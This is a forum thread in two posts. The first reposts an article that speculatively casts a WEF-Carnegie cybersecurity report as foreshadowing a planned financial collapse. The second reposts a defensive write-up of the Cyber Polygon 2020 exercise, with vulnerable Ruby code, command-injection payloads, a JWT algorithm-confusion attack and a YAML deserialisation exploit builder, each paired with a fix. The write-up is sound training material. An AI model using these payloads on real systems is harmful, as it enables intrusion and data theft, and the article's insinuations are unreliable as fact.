+ Reply to Thread
Page 1 of 2 1 2 LastLast
Results 1 to 20 of 28

Thread: WEF planning cyber attack on financial system?

  1. Link to Post #1
    Canada Avalon Member TomKat's Avatar
    Join Date
    23rd September 2017
    Posts
    2,616
    Thanks
    2,694
    Thanked 13,328 times in 2,365 posts

    Default WEF planning cyber attack on financial system?

    Like covid, they are announcing it head of time:

    https://www.activistpost.com/2021/04...al-system.html

    Better have some physical cash on hand.

    Admin editorial: this is a Whitney Webb article; she's amongst the very best independent researchers and journalists we have and her work here deserves to be placed right up-front. This isn't new news of course - it's been covered on the forum elsewhere, and discussed - Tintin.

    WEF Warns of Cyber Attack Leading to Systemic Collapse of the Global Financial System

    APRIL 7, 2021
    By Whitney Webb



    A report published last year by the WEF-Carnegie Cyber Policy Initiative calls for the merging of Wall Street banks, their regulators and intelligence agencies as necessary to confront an allegedly imminent cyber attack that will collapse the existing financial system.

    In November 2020, the World Economic Forum (WEF) and Carnegie Endowment for International Peace co-produced a report that warned that the global financial system was increasingly vulnerable to cyber attacks. Advisors to the group that produced the report included representatives from the Federal Reserve, the Bank of England, the International Monetary Fund, Wall Street giants likes JP Morgan Chase and Silicon Valley behemoths like Amazon.

    The ominous report was published just months after the World Economic Forum had conducted a simulation of that very event – a cyber attack that brings the global financial system to its knees – in partnership with Russia’s largest bank, which is due to jumpstart that country’s economic “digital transformation” with the launch of its own central bank-backed digital currency.

    More recently, last Tuesday, the largest information sharing organization of the financial industry, whose known members include Bank of America, Wells Fargo and CitiGroup, have again warned that nation-state hackers and cybercriminals were poised to work together to attack the global financial system in the short term. The CEO of this organization, known as the Financial Services Information Sharing and Analysis Center (FS-ISAC), had previously advised the WEF-Carnegie report that had warned much the same.

    Such coordinated simulations and warnings from those who dominate the current, ailing financial system are obvious cause for concern, particularly given that the World Economic Forum is well known for its Event 201 simulation about a global coronavirus pandemic that took place just months prior to the COVID-19 crisis.

    The COVID-19 crisis has since been cited as the main justification for accelerating the “digital transformation” of the financial and other sectors that the Forum and its partners have promoted for years. Their latest prediction of a doomsday event, a cyber attack that stops the current financial system in its tracks and instigates its systemic collapse, would offer the final yet necessary step for the Forum’s desired outcome of this widespread shift to digital currency and increased global governance of the international economy.

    Given that experts have been warning since the last global financial crisis that the collapse of the entire system was inevitable due to central bank mismanagement and rampant Wall Street corruption, a cyber attack would also provide the perfect scenario for dismantling the current, failing system as it would absolve central banks and corrupt financial institutions of any responsibility. It would also provide a justification for incredibly troubling policies promoted by the WEF-Carnegie report, such as a greater fusion of intelligence agencies and banks in order to better “protect” critical financial infrastructure.

    Considering the precedent of the WEF’s past simulations and reports with the COVID-19 crisis, it is well worth examining the simulations, warnings and the policies promoted by these powerful organizations. The remainder of this article will examine the WEF-Carnegie report from November 2020, while a follow-up report will focus on the more recent FS-ISAC report published last week. The WEF simulation of a cyber attack on the global financial system, Cyber Polygon 2020, was covered in detail by Unlimited Hangout in a previous report.

    The WEF-Carnegie Cyber Policy Initiative

    The Carnegie Endowment for International Peace, is one of the most influential foreign policy think tanks in the United States, with close and persistent ties to the US State Department, former Presidents, corporate America and American oligarch clans like the Pritzkers of Hyatt hotels. Current trustees of the endowment include executives from Bank of America and CitiGroup as well as other influential financial institutions.

    In 2019, the same year as Event 201, the Endowment launched its Cyber Policy Initiative with the goal of producing an “International Strategy for Cybersecurity and the Global Financial System 2021-2024.” That strategy was released just months ago, in November 2020 and, according to the Endowment, was authored by “leading experts in governments, central banks, industry and the technical community” in order to provide a “longer-term international cybersecurity strategy” specifically for the financial system.

    The initiative is an outgrowth of past efforts of the Carnegie Endowment to promote the fusion of financial authorities, the financial industry, law enforcement and national security agencies, which is both a major recommendation of the November 2020 report and a conclusion of a 2019 “high-level roundtable” between the Endowment, the IMF and central bank governors. The Endowment had also partnered with the IMF, SWIFT, Standard Chartered and FS-ISAC to create a “cyber resilience capacity-building tool box” for financial institutions in 2019. That same year, the Endowment also began tracking “the evolution of the cyber threat landscape and incidents involving financial institutions” in collaboration with BAE Systems, the UK’s largest weapons manufacturer. Per the Endowment, this collaboration continues into the present.

    In January 2020, representatives of the Carnegie Endowment presented their Cyber Policy Initiative at the annual meeting of the World Economic Forum, after which the Forum officially partnered with the Endowment on the initiative.

    Advisors to the now joint WEF-Carnegie project include representatives of central banks like the US Federal Reserve and the European Central Bank; some of Wall Street’s most infamous banks like Bank of America and JP Morgan Chase; law enforcement organizations such as INTERPOL and the US Secret Service; corporate giants like Amazon and Accenture; and global financial institutions like the International Monetary Fund (IMF) and SWIFT. Other notable advisors include the managing director and head of the WEF’s Centre for Cybersecurity, Jeremy Jurgens, who was also a key player in the Cyber Polygon simulation, and Steve Silberstein, the CEO of the Financial Services Information Sharing and Analysis Center (FS-ISAC).

    “Not a Question of If but When“

    The Cyber Policy Initiative’s November 2020 report is officially titled “International Strategy to Better Protect the Financial System.” It begins by noting that the global financial system, like many other systems, are “going through unprecedented digital transformation, which is being accelerated by the coronavirus pandemic.”

    It then warns that:
    “Malicious actors are taking advantage of this digital transformation and pose a growing threat to the global financial system, financial stability, and confidence in the integrity of the financial system. Malign actors are using cyber capabilities to steal from, disrupt, or otherwise threaten financial institutions, investors and the public. These actors include not only increasingly daring criminals, but also states and state-sponsored attackers.”
    Followed by this warning of “malign actors”, the report notes that “increasingly concerned, key voices are sounding the alarm.” It notes that Christine Lagarde of the European Central Bank and formerly of the IMF warned in February 2020 that “a cyber attack could trigger a serious financial crisis.” A year prior, at the WEF’s annual meeting, the head of Japan’s central bank predicted that “cybersecurity could become the financial system’s most serious risk in the near future.” It also notes that in 2019, Jamie Dimon of JP Morgan Chase similarly labeled cyber attacks as possibly “the biggest threat to the US financial system.”

    Not long after Lagarde’s warning, in April 2020, the Financial Stability Board asserted that “cyber incidents pose a threat to the stability of the global financial system” and that “a major cyber incident, if not properly contained, could seriously disrupt financial systems, including critical financial infrastructure, leading to broader financial stability implications.”

    The WEF-Carnegie report authors add to these concerns that “the exploitation of cyber vulnerabilities could cause losses to investors and the general public” and lead to significant damage to public trust and confidence in the current financial system. It also notes, aside from affecting the general public in a significant way, this threat would impact both high-income countries and low to lower-middle income countries, meaning its impact on the masses will be global in scope.

    The report then ominously concludes that “one thing is clear: it is not a question of if a major incident will happen, but when.“

    Ensuring control of the narrative

    Another section of the report details recommendations for controlling the narrative in the event such a crippling cyber attack takes place. The report specifically recommends that “financial authorities and industry should ensure they are properly prepared for influence operations and hybrid attacks that combine influence operations with malicious hacking activity” and that they “apply lessons learned from influence operations targeting electoral processes to potential attacks on financial institutions.”

    It goes on to recommend that “major financial services firms, central banks and other financial supervisory authorities”, representatives of which advised the WEF-Carnegie report, “identify a single point of contact within each organisation to engage social media platforms for crisis management.”

    The report’s authors argue that, “in the event of a crisis,” such as a devastating cyber attack on the global banking system, “social media companies should swiftly amplify communications by central banks” so that central banks may “debunk fake information” and “calm the the markets.” It also states that “financial authorities, financial services firms and tech companies [presumably including social media companies] should develop a clear communications and response plan focused on being able to react swiftly.” Notably, both Facebook and Twitter are listed in the report’s appendix as “industry stakeholders” that have “engaged” with the WEF-Carnegie initiative.

    The report also asserts that premeditated coordination for such a crisis between banks and social media companies needs to take place so that both parties may “determine what severity of crisis would necessitate amplified communication.” The report also calls for social media companies to work with central banks to “develop escalation paths similar to those developed in the wake of the past election interference, as seen in the United States and Europe.”

    Of course, those “escalation paths” involved wide-ranging social media censorship. The report seems to acknowledge this, when it adds that “quick coordination with social media platforms is necessary to organise content takedowns.” Thus, the report is calling for central banks to collude with social media platforms to plan out censorship efforts that would be enacted if a sufficiently severe crisis occurs in financial markets.

    As far as “influence operations” go, the report divides these into two categories; those that target individual firms and those that target markets overall. Regarding the first category, the report states that “organised actors will spread fraudulent rumours to manipulate stock prices and generate profit based on how much the price of the stock was artificially moved.” It then adds that, in these influence operations, “firms and lobbyists use astroturfing campaigns, which create a false appearance of grassroots support, to tarnish the value of a competing brand or attempt to sway policymaking decisions by abusing calls for online public comments.” The similarities between this latter statement and the Wall Street Bets phenomenon of January 2021 are obvious.

    Regarding the second category of “influence operations,” the report defines these operations as “likely to be carried out by a politically motivated actor like a terrorist group or even a nation-state.” It adds that “this type of influence operation may directly target the financial system to manipulate markets, for example, by spreading rumours about market-moving decisions by central banks” as well as spreading “false information that does not directly reference financial markets but that causes financial markets to react.”

    Given that the report states that the first category of influence operation poses little systemic risk while the second “may pose systemic risk”, it seems more likely that the event being predicted by the WEF-Carnegie report would involve claims of the latter by a “terrorist group” or potentially a nation-state. Notably, the report mentions North Korea as a likely nation-state offender on several occasions. It also dwells on the likelihood that synthetic media or “deep fakes” would be part of this system-devastating event in emerging economies and/or in high-income countries experiencing a financial crisis.

    A separate June 2020 report from the WEF-Carnegie initiative was published specifically on deepfakes and the financial system, noting that such attacks would likely transpire during a larger financial crisis to “amplify” damaging narratives or “simulate grassroots consumer backlash against a targeted brand.” It adds that “companies, financial institutions and government regulators facing public relations crises are especially vulnerable to deepfakes and synthetic media.”

    In light of these statements, it is worth pointing out that bad actors within the current system could exploit these scenarios and theories to paint actual grassroots backlash against a bank or corporation as being a synthetic “influence operation” perpetrated by “cybercriminals” or a nation-state. Considering that the WEF-Carnegie report references a scenario analogous to the Wall Street Bets situation in January 2021, a banker-led effort to falsely label a future grassroots backlash as instead being synthetic and the fault of a “terrorist group” or nation-state should not be ruled out.

    “Reducing Fragmentation”: Merging Banks with their Regulators and Intelligence Agencies

    Given the inevitability of this destructive event predicted by the report’s authors, it is important to focus in on the solutions proposed in the WEF-Carnegie report as they will become immediately relevant if this event, as predicted by the WEF and Carnegie Endowment, does come to pass.

    Some of the solutions proposed are to be expected from a WEF-linked policy document, such as the calls for increased public-private partnerships and greater coordination among regional and international organizations as well as increased coordination between national governments.

    However, the main “solution” at the heart of this report, and also at the heart of the WEF-Carnegie initiative’s other endeavors, is a call to fuse corporate banks, the financial authorities that essentially oversee them, tech companies and the national security state.

    The report’s authors first argue that the main vulnerability of the global financial system at present is “the current fragmentation among stakeholders and initiatives” and that mitigating this threat to global system lies in reducing that “fragmentation.” The report argues that the way to resolve the issue requires massive re-organization of all “stakeholders” via increased global coordination. The report notes that the “disconnect between the finance, the national security and the diplomatic communities is particularly pronounced” and calls for much closer interaction between the three.

    It then states that:

    “This requires countries not only to better organize themselves domestically but also to strengthen international cooperation to defend against, investigate, prosecute and ideally prevent future attacks. This implies that the financial sector and financial authorities must regularly interact with law enforcement and other national security agencies in unprecedented ways, both domestically and internationally.”


    Some examples of these “unprecedented interactions” between banks and the national security state are included in the report’s recommendations. For instance, it argues that “governments should use the unique capabilities of their national security communities to help protect FMIs [financial market infrastructures] and critical trading systems.” It also calls for “national security agencies [to] consult critical cloud service providers [like WEF-Carnegie initiative partner Amazon Web Services] to determine how intelligence collection could be used to help identify and monitor potential significant threat actors and develop a mechanism to share information about imminent threats” with tech companies.

    The report also states that “the financial industry should throw its weight behind efforts to tackle cyber crime more effectively, for example by increasing its participation in law enforcement efforts.”

    On that last point, there are indications this has already begun. For instance, Bank of America, the second largest bank in the US and part of the WEF-Carnegie Initiative and FS-ISAC, was reported to have “actively but secretly engaged” with US law enforcement agencies in the hunt for “political extremists” following the January 6th events at Capitol Hill. In doing so, Bank of America shared private information with the federal government without the knowledge or consent of its customers, leading critics to accuse the bank of “effectively acting as an intelligence agency.”

    Yet, arguably the most troubling part of the report is its call to unite the national security apparatus and the finance industry first, and then use that as a model to do the same with other sectors of the economy. It states that “protecting the international financial system can be a model for other sectors,” adding that “focusing on the financial sector provides a starting point and could pave the way to better protect other sectors in the future.”

    Were all the sectors of the economy to also fuse with the national security state, it would inevitably create a reality where there is no part of daily human life that is not ultimately controlled by these two already very powerful entities. This is a clear recipe for techno-fascism on a global scale. As this WEF-Carnegie report makes clear, the roadmap regarding how to cook up such a nightmare has already been charted out in coordination with the very institutions, banks and governments that currently control the global financial system.

    Not only that, but – as pointed out in Unlimited Hangout’s article on Cyber Polygon – the World Economic Forum and many of its partners have a vested interest in the systemic collapse of the current financial system. In addition, many central banks have recently backed new digital currency systems that can only achieve rapid, mass adoption if the existing system collapses.

    Given that these systems are set to be integrated with biometric IDs and so-called “vaccine passports” through the WEF and Big Tech-backed Vaccine Credential initiative, it is worth considering the timing of the expected launch of such systems in determining when this predicted and allegedly inevitable event is likely to occur.

    With this new financial system so deeply inter-connected to these “credential” efforts, this cyber attack on the financial sector would likely take place at a time when it would best facilitate the adoption of the new economic system and its integration into credential systems currently being promoted as a “way out” of COVID-19-related restrictions.

    Source: The Last American Vagabond

    ---------------------

    Whitney Webb is a staff writer for The Last American Vagabond. She has previously written for Mintpress News, Ben Swann’s Truth In Media. Her work has appeared on Global Research, the Ron Paul Institute and 21st Century Wire, among others. She currently lives with her family in southern Chile.

    https://www.thelastamericanvagabond..../whitney-webb/

    _______________

    Carnegie report: International Strategy to Better Protect the Financial System Against Cyber Attacks -
    - Maurer + Nelson (document runs to 242 pages and too large to embed here)
    Last edited by Tintin; 8th April 2021 at 09:54.

  2. The Following 32 Users Say Thank You to TomKat For This Post:

    All is one (10th July 2021), amor (2nd March 2022), Ba-ba-Ra (8th April 2021), bennycog (8th April 2021), Bill Ryan (8th April 2021), Chris Gilbert (8th June 2021), DeDukshyn (8th April 2021), Dick (8th April 2021), ExomatrixTV (8th June 2021), Gekko (8th June 2021), gord (8th April 2021), Gwin Ru (10th July 2021), Harmony (8th April 2021), Ioneo (8th April 2021), lizhekb (11th July 2021), mountain_jim (8th April 2021), O Donna (10th April 2021), onevoice (8th April 2021), palehorse (8th April 2021), Peace in Oz (8th April 2021), Reinhard (8th May 2021), Sadieblue (8th April 2021), Sérénité (6th May 2021), Snoweagle (8th April 2021), Sue (Ayt) (10th July 2021), Sunny (8th April 2021), T Smith (13th April 2021), Tintin (8th April 2021), toppy (8th April 2021), Valle (8th April 2021), Violet3 (8th April 2021), Yoda (8th April 2021)

  3. Link to Post #2
    UK Moderator/Librarian/Administrator Tintin's Avatar
    Join Date
    3rd June 2017
    Location
    Project Avalon library
    Language
    English
    Age
    54
    Posts
    5,420
    Thanks
    64,185
    Thanked 46,345 times in 5,388 posts

    Default "Cyber Polygon" Simulation Exercise - July 2020

    We of course all know where these 'simulation' exercises lead.

    Forgive the inclusion here of the coding from their site, but, for the super-smart of you out there who understand code well, may find something of interest there. It's a direct copy/paste from their site and I think may prove interesting.

    And we don't give the geekier ones of you anywhere near enough to possibly feed on . Do note that the appearance of emojis part way through some of the code is a result obviously of eg colon + p being used in the code.

    ---------------------------------------------------------

    Overview from website:
    Cyber Polygon 2020
    In 2020, the live stream gathered 5 million spectators from 57 nations. The event featured the world’s leaders and renowned experts, including Mikhail Mishustin, Prime Minister of the Russian Federation, Klaus Schwab, Founder and Executive Chairman, World Economic Forum, top officials from INTERPOL, ICANN, Visa, IBM, Sber, MTS and other organisations.

    The technical exercise attracted 120 of the largest enterprises from 29 countries. These included financial, healthcare and educational institutions, state and law enforcement agencies, energy suppliers, companies from IT, metal, telecom, chemical, aerospace engineering and other sectors.
    -----------------------

    Defence Scenario: Cyber Polygon 2020 Technical Exercise Write-up -https://2020.cyberpolygon.com/materi...-polygon-2020/

    On 8 July 2020, Cyber Polygon — an international online cybersecurity training — took place for the second time. The technical exercise was attended by 120 teams from some of the largest Russian and international organisations across 29 countries. Among the participants were: banks, telecom providers, energy suppliers, medical institutions, universities as well as government and law enforcement agencies.

    The participants acting as Blue Teams had to defend their segments of the training infrastructure. The organisers (BI.ZONE) acted as the Red Team and simulated the cyberattacks.

    The exercise included two scenarios: Defence and Response

    This article goes into details of the Defence scenario, where the participants had to repel an attack conducted by the Red Team, and covers the following topics:

    - basic game mechanics
    - infrastructure and game service provided to the participants
    - vulnerabilities embedded in the services
    - exploitation scenarios and attack detection methods
    - vulnerability remediation methods

    Legend
    According to the legend, the organisation’s virtual infrastructure included a service which processed confidential client information. This service became the subject of interest to an APT group. Cybercriminals were going to steal confidential user data and then resell it on the Darknet in order to receive a financial benefit and cause damage to company reputation.

    The APT group studied the target system in advance and discovered several critical vulnerabilities. The gang launched the attack on the day of the exercise.

    The Blue Teams had to:

    - contain the attack as fast as possible
    - minimise the amount of information stolen
    - maintain the service availability
    - The participants could apply any available and familiar methods and tools to
    protect the infrastructure.

    Core Mechanics
    The team members who had participated in Attack-Defenсe CTF may have noticed some similarities between this format of cybersecurity competition and the scenario being described. However, during the Cyber Polygon training, the participants were not expected to attack each other — all they had to do was protect their own services.

    This rule was introduced to ensure that all the participants were on an equal playing field and could focus on improving their defensive skills. Besides, it enabled a more objective assessment of the teams’ skills due to more accurate quantitative metrics.

    The following indicators were used as metrics:

    Health Points (HP). A simple numerical value. Every time when the Red Team successfully exploited a vulnerability in the Blue Team’s services and captured the flag, the Blue Team lost HP. The more vulnerabilities the Red Team was able to exploit, the more HP the team lost. HP was deducted once per round.

    Service Level Agreement (SLA). In the context of this scenario, SLA indicated the integrity and accessibility of a service. It was measured as a percentage (0–100%). The defending team lost SLA points if the service was made unavailable or malfunctioned at the moment the checker contacted it. The checker could access any service several times per round, but each team’s services were checked an equal number of times. The resulting SLA was calculated as the percentage of successful checks (when the service was available and fully functional) to the total number of checks.

    Checker is the mechanics that allowed the organisers to check if the teams’ services were fully functional. Since the game service simulated a real web application, the checker was also used to ensure compliance with the rules of the game: the participants could not simply turn off the service or disable some of its features, all they could do was defend their segments against Red Team attacks.

    The final score for the scenarios was calculated as SLA * HP.

    The participants were given 30 minutes for preparation, i.e. they were supposed to familiarise themselves with the service provided, roll out monitoring and defensive tools and start searching for vulnerabilities in the service code.

    After the 30 minutes began the so-called ’active phase’ of the scenario: the Red Team started their attack. The active phase consisted of 18 rounds, 5 minutes each.

    Before the start of the scenario, each team received 180 HP for each of the 5 vulnerabilities embedded in the service (900 HP in total). The team lost 10 HP for each vulnerability exploited. Thus, if the team had 3 vulnerabilities exploited during a round, it lost a total of 30 HP in this round, and if 5 vulnerabilities were exploited — 50 HP respectively.

    Apart from controlling the availability of the teams’ services, the checker was used to deliver the so-called flag to the teams’ services at the beginning of each round (using legitimate service functions). Flag is a ‘Polygon{JWT}’ format string, where JWT stands for JSON Web Token.

    In this scenario, the flag represented confidential data: the more flags the Red Team was able to steal, the more data was leaked. A stolen flag also meant the exploitation of a vulnerability: the team lost HP once the Red Team took advantage of a vulnerability and grabbed the flag.


    Infrastructure and Game Service
    Each participating team was provided with a virtual server running the Linux operating system.

    After connecting via VPN, the participants got access to their server through SSH. The teams were granted full (root) access to their system.

    The participants’ game service was available from the user’s home directory /home/cyberpolygon/ch4ng3org.

    The game service backend was written in Ruby, while the frontend used the React JS framework. The database was managed by the PostgreSQL DBMS.

    The service was designed to be rolled out on Docker, which was evident from its directory: for instance, it contained such files as Dockerfile and docker-compose.yml.

    The participants had full access to the service’s source codes, configuration files and the database, and could use this information to search for and fix vulnerabilities in the service.


    Vulnerabilities
    Insecure Direct Object References

    The vulnerability referred to as insecure direct object reference (IDOR) is caused by flaws in authorisation mechanisms. The vulnerability allows an attacker to gain access to otherwise inaccessible user data.

    This vulnerability was present in the game service under the get method of the UsersController class.

    backend/app/controllers/users_controller.rb:
    >
    def get
    user = User.find(params[:id])
    if params[:full].present?
    json_response({
    id: user.id,
    name: user.name,
    email: user.email,
    phone: user.phone
    })
    else
    json_response({
    id: user.id,
    name: user.name
    })
    end
    end
    When calling the address http://example.com/api/users/<USER_ID>, where USER_ID is a numeric user identifier, any user could get a JSON object containing a numeric identifier and a username corresponding to that numeric identifier.

    This functionality as such does not pose any threat to user data. You should rather focus on the following code snippet:
    >
    if params[:full].present?
    json_response({
    id: user.id,
    name: user.name,
    email: user.email,
    phone: user.phone
    })
    Note that if the full parameter is transmitted in a request, the server response will return more data: in addition to the user ID and username, it will contain their email and phone number.

    The flags were stored in and could be stolen from the user.phone field in the game service’s directory (this activity could be detected, for example, by analysing the network traffic). Each round, the checker created several users and saved the flag as one of such users’ phone number.

    In order to take advantage of this weakness, the Red Team sent requests like http://example.com/api/users/<USER_ID>?full=1 to the service and searched for the flag in the phone field of the output JSON objects.

    To protect against this vulnerability, it would be good practice to obscure sensitive data when displaying it to the user. Thus, the phone number +71112223344 can be shown as +7111*****44.

    For example:
    >
    def get
    user = User.find(params[:id])
    if params[:full].present?
    # Masking user's phone number
    uphone = user.phone
    x = 5
    y = uphone.length - 3
    replacement = '*'*(y-x)
    uphone[x..y] = replacement

    json_response({
    id: user.id,
    name: user.name,
    email: user.email,
    phone: uphone
    })
    else
    json_response({
    id: user.id,
    name: user.name
    })
    end
    end
    In this case, the Red Team would have got a line like Polyg********X} instead of the full flag value and the participating team could have avoided losing HP due to this vulnerability being exploited.


    Command Injection
    Command injection is the result of inadequate filtering of user data. This vulnerability enables an attacker to inject OS commands that are executed on the target system with the privileges of the vulnerable application.

    In the game service, the vulnerability was present in the disk_stats method of the StatsController class.

    backend/app/controllers/stats_controller.rb:

    def disk_stats
    if params[:flags].present?
    flags = params[:flags]
    else
    flags = ''
    end

    json_response({
    disk: `df #{flags}`
    })
    end

    When calling the address http://example.com/api/disk_stats, the service responds with the output system df utility in the JSON object disk field, which allows to evaluate the amount of free space in the file system.

    The command being called was designed to transmit various parameters, but their value is not filtered out:

    >
    if params[:flags].present?
    flags = params[:flags]
    ~~~~~~~~~~~~~~~~~~~~~~~~~~
    json_response({
    disk: `df #{flags}`
    })
    This means that a potential attacker can execute virtually any command in the system using special command-line syntax.

    For example, by running a request http://example.com/api/disk_stats?flags=;cat /etc/passwd a threat actor will be able to read the contents of system file /etc/passwd.

    This is how the Red Team exploited this weakness:

    By sending a request http://example.com/api/disk_stats?flags=>dev/null;cat config/secrets.yml, the attackers obtained the contents of the backend/config/secrets.yml file, which stored the private key for signing JWT tokens.

    Having obtained the private key, the Red Team could generate and sign a JWT token valid for any user. Given that the Red Team used the current private key of the service, this token would have been successfully validated and accepted by the application.

    By sending a request http://example.com/api/me on behalf of the user for whom the token was generated, the Red Team obtained the user’s phone number and checked it for a flag.

    To protect against this vulnerability, a sufficient measure was to prohibit any parameters from being injected in the command call, as the overall system performance is not tied to this endpoint being used:

    def disk_stats
    json_response({
    disk: `df`
    })
    end

    Security Misconfiguration
    The vulnerability known as security misconfiguration is usually caused by a human factor. Standard application configurations are often not specifically geared towards security. Due to the lack of proactivity, attention or competence of responsible staff, these configurations sometimes remain unadapted to harsh realities which comes with significant security implications.

    The game service had this vulnerability embedded in the db service description, in the docker-compose.yml file.
    docker-compose.yml:


    db:
    image: postgres
    restart: always
    network_mode: bridge
    volumes:
    - ./db_data:/var/lib/postgresql/data
    ports:
    - 5432:5432
    environment:
    POSTGRES_DB: ch4ng3
    POSTGRES_USER: ch4ng3
    POSTGRES_PASSWORD: ch4ng3
    As you can see, the network port of the database is available from the external network:

    ports:
    - 5432:5432
    Besides, the database server uses one and the same line as a database name, username and password, which also matches the service ch4ng3.org.

    Having detected the database port as a result of network scanning, the Red Team was able to brute-force the login and password to the database. It then executed an SQL statement below, which returned all user phone numbers with flags inside:


    SELECT phone FROM users WHERE phone LIKE 'Polygon%'
    To protect against this vulnerability, the ideal solution would have been to prohibit the database from being connected externally and to change the database user password (with the api service reconfigured accordingly):

    db:
    image: postgres
    restart: always
    network_mode: bridge
    volumes:
    - ./db_data:/var/lib/postgresql/data
    environment:
    POSTGRES_DB: ch4ng3
    POSTGRES_USER: ch4ng3
    POSTGRES_PASSWORD: <VERY_SECRET_PASSWORD>

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    environment:
    - DATABASE_URL=postgres://ch4ng3:<VERY_SECRET_PASSWORD>@db:5432/ch4ng3?sslmode=disable
    However, one of the two actions would have sufficed: either changing the database user password to a stronger one or prohibiting database connections from the external network.


    JWT Signature Algorithm Change
    The next vulnerability buried in the game service related to JWT signature algorithm change.

    It was present in the decode method of the JsonWebToken class.

    backend/app/lib/json_web_token.rb:

    def self.decode(token, algorithm)
    # cannot store key as ruby object in yaml file
    public_key = Rails.application.secrets.public_key_base
    if algorithm == 'RS256'
    public_key = OpenSSL:Key::RSA.new(public_key)
    end
    # get payload; first index in decoded array
    body = JWT.decode(token, public_key, true, {:algorithm => algorithm})[0]
    HashWithIndifferentAccess.new body
    # rescue from expiry exception
    rescue JWT::ExpiredSignature, JWT::VerificationError => e
    # raise custom error to be handled by custom handler
    raise ExceptionHandler::InvalidToken, e.message
    end
    The following lines deserve a closer look:

    public_key = Rails.application.secrets.public_key_base
    if algorithm == 'RS256'
    public_key = OpenSSL:Key::RSA.new(public_key)
    end
    # get payload; first index in decoded array
    body = JWT.decode(token, public_key, true, {:algorithm => algorithm})[0]
    The application loads the line with the service public key from the configuration file and, where an RS256 algorithm has been transmitted in the token, converts that line to an RSA public key, which is further used to verify the token signature.

    Note that if any other value is transmitted in the algorithm parameter, the public key line will not be converted. If the HS256 value is sent to the alg JWT field, the HMAC symmetric algorithm will be used for token signature verification, and exactly this public key line will be used as a key to verify the token signature.

    This is how this weakness was exploited by the Red Team:

    By sending a request http://example.com/api/auth/third_party, the attackers received the service public key from the public_key field of the output JSON object.
    Having obtained the public key, the Red Team could generate a valid JWT token for any user by sending the HS256 value to the alg JWT field and signing the token, with the service public key line used as a secret for the HMAC algorithm.
    By sending a request http://example.com/api/me on behalf of the user for whom the token was generated, the Red Team obtained the user’s phone number and checked it for a flag.

    To protect against this vulnerability, the following recommendation could have helped: when working with JWT, you better use only one signature algorithm at a time — either symmetric or asymmetric. Thus, the easiest fix would be:

    backend/app/lib/json_web_token.rb:


    def self.decode(token, algorithm)
    # cannot store key as ruby object in yaml file
    public_key = Rails.application.secrets.public_key_base
    if algorithm == 'RS256'
    public_key = OpenSSL:Key::RSA.new(public_key)
    else
    raise ExceptionHandler::InvalidToken, Message.invalid_token
    end
    # get payload; first index in decoded array
    body = JWT.decode(token, public_key, true, {:algorithm => algorithm})[0]
    HashWithIndifferentAccess.new body
    # rescue from expiry exception
    rescue JWT::ExpiredSignature, JWT::VerificationError => e
    # raise custom error to be handled by custom handler
    raise ExceptionHandler::InvalidToken, e.message
    end


    Now, if you send a value other than RS256 to the token’s alg field, the token will be marked as invalid and the Red Team will not be able to access the application on behalf of other users by signing tokens with the service public key.


    YAML Insecure Deserialisation
    The last vulnerability embedded in the game service was associated with YAML insecure deserialisation.

    The import method of the PetitionsController class was responsible for importing petitions through their YAML-format description.

    backend/app/controllers/petitions_controller.rb:

    def import
    yaml = Base64.decode64(params[etition])
    begin
    petition = YAML.load(yaml)
    rescue Psych::SyntaxError => e
    json_response({message: e.message}, 500)
    return
    rescue => e
    json_response({message: e.message, trace: ([e.message]+e.backtrace).join($/)}, 500)
    return
    end
    if petition['created_at']
    petition = current_user.petitions.create!(text: petition['text'], title: petition['title'], created_at: petition['created_at'])
    else
    petition = current_user.petitions.create!(text: petition['text'], title: petition['title'])
    end
    petition.signs.create!(petition_id: petition.id, user_id: current_user.id)
    json_response(petition)
    end
    Particular attention should have been given to the following code lines:


    yaml = Base64.decode64(params[etition])
    begin
    petition = YAML.load(yaml)
    rescue Psych::SyntaxError => e
    json_response({message: e.message}, 500)
    return
    As you may have noticed, the contents of a YAML object are taken from the base64-coded petition parameter and then converted into Ruby objects using the YAML.load(yaml) structure.

    This structure is insecure and allows, among other things, arbitrary Ruby code execution on the target system within the vulnerable application, which is what the Red Team did.

    The following script was used to generate a YAML object to take advantage of this weakness:


    require "erb"
    require "base64"
    require "active_support"

    if ARGV.empty?
    puts "Usage: exploit_builder.rb <source_file>"
    exit!
    end

    erb = ERB.allocate
    erb.instance_variable_set :@src, File.read(ARGV.first)
    erb.instance_variable_set :@lineno, 1

    depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result

    payload = Base64.encode64(Marshal.dump(depr))

    puts <<-PAYLOAD
    ---
    !ruby/object:Gem::Requirement
    requirements:
    - !ruby/object:Rack::Session::Abstract::SessionHash
    req: !ruby/object:Rack::Request
    env:
    rack.session: !ruby/object:Rack::Session::Abstract::SessionHash
    loaded: true
    HTTP_COOKIE: "a=#{payload}"
    store: !ruby/object:Rack::Session::Cookie
    coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {}
    key: a
    secrets: []
    exists: true

    PAYLOAD
    The following code was applied as the payload:

    phones = ''
    User.all().each do |user|
    phones += user.phone + ';'
    end
    raise phones
    The code received the phone numbers of all users registered with the service, combined them through ( and applied the raise structure to cause an exception, sending the line with the users’ phone numbers as an error message.

    The error message was then returned by the server to the JSON object message field together with the response code 500. Once the Red Team received this response, all it had to do was locate the flag in the error message.

    To protect against this vulnerability, it was sufficient to replace the call of the YAML.load(yaml) function with the call of the YAML.safe_load(yaml) function. However, during the availability check, the checker verified that the transmitted YAML object allowed for aliases to be applied. Hence, the resulting structure is represented as follows: YAML.safe_load(yaml, aliases: true).

    And the resulting secure function accordingly:

    def import
    yaml = Base64.decode64(params[etition])
    begin
    petition = YAML.safe_load(yaml, aliases: true)
    rescue Psych::SyntaxError => e
    json_response({message: e.message}, 500)
    return
    rescue => e
    json_response({message: e.message, trace: ([e.message]+e.backtrace).join($/)}, 500)
    return
    end
    if petition['created_at']
    petition = current_user.petitions.create!(text: petition['text'], title: petition['title'], created_at: petition['created_at'])
    else
    petition = current_user.petitions.create!(text: petition['text'], title: petition['title'])
    end
    petition.signs.create!(petition_id: petition.id, user_id: current_user.id)
    json_response(petition)
    end
    Conclusion
    In our article, we explored the vulnerabilities implanted in Cyber Polygon’s Defence scenario game service, analysed the applied exploitation scenarios and gave examples of remediation that would have allowed the participants to protect their services against the Red Team.

    We would use the patch methods from the examples in a real-life situation. However, you should keep in mind that these are not the only possible effective methods.

